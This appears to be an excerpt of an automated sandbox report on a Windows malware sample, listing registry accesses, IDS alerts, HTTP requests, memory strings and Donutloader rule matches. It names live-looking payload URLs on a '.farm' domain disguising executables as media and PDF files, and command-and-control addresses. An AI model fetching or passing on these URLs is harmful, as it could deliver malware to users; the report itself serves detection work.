                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 07B8B94Ch
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 07B8B94Ch
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 07B8CF3Eh
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 4x nop then jmp 06D5CF3Eh
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 4x nop then jmp 06D5B94Ch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 4x nop then jmp 06D5B94Ch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 188.114.96.3:443 -> 192.168.2.4:49731
                    Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 188.114.96.3:443 -> 192.168.2.4:49731
                    Source: TrafficSnort IDS: 2020482 ET CURRENT_EVENTS DRIVEBY GENERIC ShellExecute in Hex No Seps 188.114.96.3:443 -> 192.168.2.4:49731
                    Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 188.114.96.3:443 -> 192.168.2.4:49732
                    Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 188.114.96.3:443 -> 192.168.2.4:49732
                    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 77.221.140.76:58001
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2-m/kr/Wudbiu.exe HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2-m/Dllzeadr.pdf HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 77.221.140.76 77.221.140.76
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2-m/kr/Wudbiu.exe HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2-m/Dllzeadr.pdf HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                    Source: global trafficDNS traffic detected: DNS query: 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                    Source: powershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                    Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm8
                    Source: powershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: file.exe, 00000000.00000002.1789639440.0000000007729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso
                    Source: file.exe, 00000000.00000002.1788650172.0000000007287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: file.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000006.00000002.2347588371.000002112F32A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.
                    Source: file.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                    Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000000.1930459181.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe.4.drString found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdf
                    Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbi
                    Source: file.exe, TypeId.exe.0.drString found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp4
                    Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: powershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5T
                    Source: powershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003170000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65277
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 65277 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:65277 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.txxbiwtbs.exe.4074c50.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 11.2.txxbiwtbs.exe.4024c30.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0610D708
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0610FDA8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E0D280
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E0A590
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0711CD28
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0711B368
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B889D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B94288
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07B94278
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E6D8A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E50040
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09E50039
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB830E9
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D58948
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D64288
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D64278
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_06D62B4F
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07125618
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_0712DEAF
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_071215B0
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_0712CAE8
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07125617
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_0712CAD9
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07122918
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07122908
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_075FC628
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_075FA458
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_075FC619
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07A7A590
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07A7D280
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BE9F10
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BE4760
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BED337
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BE5378
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BEB6A0
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BE4AA8
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_08DDD8A0
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_08DC0040
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_08DC000A
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BE0006
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 3_2_07BE0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_07BCD708
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08ADCAE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD15B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08ADDEAF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2EE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD5059
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD390B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08ADCAD9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD5618
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2FA2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2FE4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2F2A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2EE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AD2F70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08B0D8A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AF0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_08AF0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3BCB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3BA538
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A3BCAF9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A819F10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A81D337
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A815378
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A810040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A814760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A814AA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A810007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A81B6A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9BCD28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0A9BB368
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056BD508
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056BCC2E
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056BD4F9
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056BD698
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056F4C37
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056F4418
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056F451D
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_056F4408
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_06525254
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_06522A5C
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_065208C0
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_06521B78
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_0652179C
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_06521FA8
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_083CDDE0
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 11_2_083B0037
